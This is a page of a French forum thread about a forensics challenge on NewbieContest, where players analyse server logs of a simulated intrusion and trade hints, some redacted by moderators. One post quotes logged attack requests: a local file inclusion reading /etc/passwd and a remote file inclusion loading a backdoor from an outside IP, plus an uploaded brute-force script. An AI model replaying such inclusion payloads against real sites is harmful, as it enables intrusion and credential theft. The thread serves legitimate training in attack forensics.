logo Homepage
+  NewbieContest
|-+  Challenges» Aide Forensics» Forensics - Analyse d'attaque
Username:
Password:
Pages: 1 ... 5 6 [7] 8 9
  Retourner à l'épreuve    Imprimer  
Auteur Fil de discussion: Forensics - Analyse d'attaque  (Lu 76744 fois)
Ch0bi7s
Profil challenge

Classement : 13355/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 1


Voir le profil
« #90 le: 07 Mars 2012 à 18:48:53 »

Yop,

Je galère aussi sur le même mot de passe, c'est marrant parce que quand on lit le topic on voit que les premiers qui galéraient ne trouvaient pas le mot de passe qu'on a trouvé (merci les astuces quand même, ça doit y jouer) et maintenant c'est l'inverse, Q_Q.

Ça doit être cool d'être présent sur une épreuve le jour de sa sortie, là même si y'a toujours le challenge y'a (quasiment) pas de communication ^^
Journalisée
PAF

Profil challenge

Classement : 298/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 10


Voir le profil
« #91 le: 05 Avril 2012 à 10:13:29 »

Bon j'avais un peu laisser cette épreuve de coté pour non résultat et je la reprend maintenant et je me met a remettre en question mes résultats.
Je pense avoir trouvé le mdp root /* moderated par the lsd : l'indice était bien trouvé et drôle, mais ça fait trop quand même pour que je le laisse. */
Mais la solution n'est pas accepté par l'input donc j'en déduit que je n'ai pas le bon mdp john. Peut t'on retrouver ce mdp en comptant les requête dans le fichier log ou est plus subtil?

Edit:j'ai mas réponse, suffi de regarder correctement toutes les entrée du fichier.... je me sent con...

Salut,

Si tu galères sur le mot de passe de l'utilisateur john, cela pourrait t'aider.
« Dernière édition: 22 Avril 2012 à 15:44:06 par PAF » Journalisée

PAF
pntstr
Profil challenge

Classement : 11829/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 1


Voir le profil
« #92 le: 29 Avril 2012 à 15:44:44 »

Bon je viens de valider cet épreuve, en qlq sort "c facile"...pour ceux qui n'ont pas encore valider cet épreuve je vais vous aider par qlq indices.

/* moderated par the lsd : ouais, ben oupa hein ! Tu donnes limite la solution...*/
Bonne chance !!
« Dernière édition: 29 Avril 2012 à 17:12:47 par the lsd » Journalisée
Asteriksme
Modérateur Global

Profil challenge

Classement : 32/52976

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 785

.


Voir le profil WWW
« #93 le: 29 Avril 2012 à 18:52:45 »

en fait t'écris en abrégé, même  ton pseudo! le problème c'est qu'on comprend pas quand y a trop de lettres qui manquent!
Journalisée

"It's a funny thing about some mathematicians. We often don't care if the results have applications because the results are themselves so pretty."
baashxiv
Profil challenge

Classement : 13355/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 4


Voir le profil
« #94 le: 04 Août 2012 à 18:12:29 »

Salut merci pour cette épreuve elle est super

mais je n'arrive pas a trouver le pass de john
J'ai trouver un fichier contenant ces info : Oct 15 21:34:40 chaos proftpd[6312] 199.230.171.106: FTP session opened.
Oct 15 21:34:42 chaos proftpd[6312] 199.230.171.106: USER ftpsite: Login successful.
Oct 15 21:34:57 chaos proftpd[6312] 199.230.171.106: FTP session closed.

Donc j'ai chercher dans celui repertioriant toutes les connection et j'y ais trouver ces activité : [15/Oct/2006:21:30:21 +0200] "GET index.php?page=/etc/passwd

[15/Oct/2006:21:31:08 +0200] "GET index.php?page=http://199.230.171.106/backdoor.txt

[15/Oct/2006:21:31:53 +0200] "GET index.php?page=http://199.230.171.106/backdoor.txt&file=pass.php
Je pense que l'intrus as le fichier contenant le mots de pass de john : pass.php
[15/Oct/2006:21:44:29 +0200] "GET images/thumbs/brutus.php
Mais pourquoi il upload brutus dans ce cas ??

et si ce pass.php existe bel et bien ou le trouver ?
Merci de m'aider suis-je sur la bonne vois ?
Journalisée
kent-de-champ

Profil challenge

Classement : 2586/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 11


Voir le profil
« #95 le: 26 Décembre 2012 à 20:17:07 »

Salut a tous, sa fais depuis plusieurs mois que je suis sur cette épreuve et je n'arrive pas a trouvé le bout, est-ce que quelqu'un pourrait m'apporter un peu d'aide ??  En MP ?

Merci a vous !
Journalisée
wiwiland
Beta testeur

Profil challenge

Classement : 101/52976

Membre Complet
*
Hors ligne Hors ligne
Messages: 175


Voir le profil
« #96 le: 27 Décembre 2012 à 11:19:40 »

Plusieurs mois ?
Je pense que tu peux changer ton avatar dans ce cas...
Un bon éditeur de texte et c'est validé !
Journalisée
kent-de-champ

Profil challenge

Classement : 2586/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 11


Voir le profil
« #97 le: 29 Décembre 2012 à 20:53:30 »

Ouai stuveut Mais sur ce cou la ta perdu une occasion de te taire !!
Journalisée
the lsd
Administrateur

Profil challenge

Classement : 183/52976

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3090

poulping for fun & profit


Voir le profil WWW
« #98 le: 02 Janvier 2013 à 11:24:37 »

Ouai stuveutx Mais sur ce coup la t'as perdu une occasion de te taire !!

Si on évitait de régler les comptes sur le fil de discussion ça m'arrangerait je dois avouer

Enjoy

The lsd
Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
zaikoe
Profil challenge

Classement : 2350/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 3


Voir le profil
« #99 le: 28 Juin 2013 à 23:34:01 »


Es-ce que sa sert pour le mdp john ???

ftpsite john13/04
Journalisée
zaikoe
Profil challenge

Classement : 2350/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 3


Voir le profil
« #100 le: 28 Juin 2013 à 23:37:28 »

et j'ai aussi trouvé hello04
Journalisée
Mandrake

Profil challenge

Classement : 316/52976

Membre Junior
**
Hors ligne Hors ligne
Messages: 53


Voir le profil
« #101 le: 13 Février 2015 à 01:23:37 »

Salut

Je m'attaque à cette épreuve hyper instructive.
Je pense avoir trouvé la faille (très connue) qui a permis à l'attaquant de passer à la deuxième phase de son plan machiavélique : trouver le mdp de john.
A partir de là, l'attaquant ne peut toujours pas avoir accès au mdp root car celui-ci est inaccessible dans le etc/shadow. Pour le récupérer, /* Modéré : inutile de le dire */ (très astucieux !!)

Problème : si j'ai bien compris la feinte, le mdp root que je récupère est donc censé être en clair... or, il ne valide pas l'épreuve (et il est plutôt long à transmettre)

Ai-je au moins bon sur le déroulement de l'attaque ?
Du coup, comment expliquer la drôle de syntaxe du mdp root (qui devrait être clair)?


PS : j'ai exécuté le /* Modéré */ sur un linux pour vérifier le résultat. La feinte est plutôt efficace !

Merci
« Dernière édition: 13 Février 2015 à 12:37:15 par Asteriksme » Journalisée
Pijiu
Profil challenge

Classement : 4413/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 6


Voir le profil
« #102 le: 17 Février 2015 à 11:40:09 »

Peut-être que c'est le mot de passe de john que tu n'as pas bien récupérer ?

La pass john est beaucoup plus difficile (selon moi) à récuperer que le pass root.
Il faut bien analyser les sources et les noms de fichiers
Journalisée
kevin56140

Profil challenge

Classement : 1321/52976

Néophyte
*
Hors ligne Hors ligne
Messages: 34


Voir le profil
« #103 le: 24 Mars 2015 à 17:38:39 »

Bonjour à tous,

Je me permets de poster car je bute sur cette épreuve qui est vraiment très intéressante notamment le fait de devoir fouiner afin de rechercher des traces.

J'ai commencé par analyser les logs du serveur apache. Il y a une ligne que je ne comprends pas et je me suis dis que peut être pourriez vous m'éclairer à ce sujet.

Voici la ligne en question :

GET index.php?page=/etc/passwd HTTP/1.1" 200 1679 "http://prive/"

le /etc/passwd je comprend  (Méthode DT) ce qui a été fait  et pourquoi. Ce que je ne comprends pas c'est "http://prive/"

Serait-ce quelque chose de cacher, un répertoire... ? Veuillez modérer si j'en dis trop.

Merci de votre attention.
Journalisée
the lsd
Administrateur

Profil challenge

Classement : 183/52976

Membre Héroïque
*****
Hors ligne Hors ligne
Messages: 3090

poulping for fun & profit


Voir le profil WWW
« #104 le: 24 Mars 2015 à 19:53:36 »

Le plus simple est que tu regardes la configuration des logs d'accès apache, tu verras, après, tu comprendras 

Enjoy

The lsd
Journalisée

Newbie Contest Staff :
The lsd - Th3_l5D (IRC)
Statut :
Administrateur
Citation :
Cartésien désabusé : je pense, donc je suis, mais je m'en fous !
Pages: 1 ... 5 6 [7] 8 9
  Retourner à l'épreuve    Imprimer  
 
Aller à: